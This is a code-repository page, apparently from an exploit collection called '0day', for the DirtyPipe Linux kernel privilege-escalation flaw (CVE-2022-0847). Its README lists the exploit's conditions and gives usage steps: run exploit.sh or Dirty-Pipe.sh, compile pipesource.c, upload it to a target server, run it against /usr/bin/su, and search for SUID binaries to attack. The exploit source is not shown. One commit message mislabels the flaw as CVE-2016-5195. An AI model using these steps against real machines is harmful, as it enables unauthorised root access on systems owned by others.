admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
0day/98-Linux提权/CVE-2022-0847-DirtyPipe提权
History
helloexp 01259a5cfc add usage for CVE-2022-0847
2023-06-15 14:28:45 +08:00
..
Dirty-Pipe.sh
fix typo
2023-06-15 14:05:52 +08:00
exploit.sh
add CVE-2016-5195 Linux 内核提权漏洞(DirtyPipe)
2022-03-10 11:32:47 +08:00
pipesource.c
add CVE-2022-0847 local compile method
2023-06-15 14:20:55 +08:00
README.md
add usage for CVE-2022-0847
2023-06-15 14:28:45 +08:00

README.md

Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)

漏洞描述

漏洞类似于 脏牛CVE-2016-5195 “Dirty Cow”但是更加容易利用

提权限制

  1. the attacker must have read permissions (because it needs to splice() a page into a pipe)
  2. the offset must not be on a page boundary (because at least one byte of that page must have been spliced into the pipe)
  3. the write cannot cross a page boundary (because a new anonymous buffer would be created for the rest)
  4. the file cannot be resized (because the pipe has its own page fill management and does not tell the page cache how much data has been appended)

使用方法

bash exploit.sh
#或执行 
bash Dirty-Pipe.sh

源码本地编译上传靶标方法

gcc pipesource.c -o pipesource

然后直接将 pipesource 上传到目标服务器运行 ./pipsource /usr/bin/su

其中 /usr/bin/su 为具有suid 权限的文件
搜索方法如下: find / -perm -u=s -type f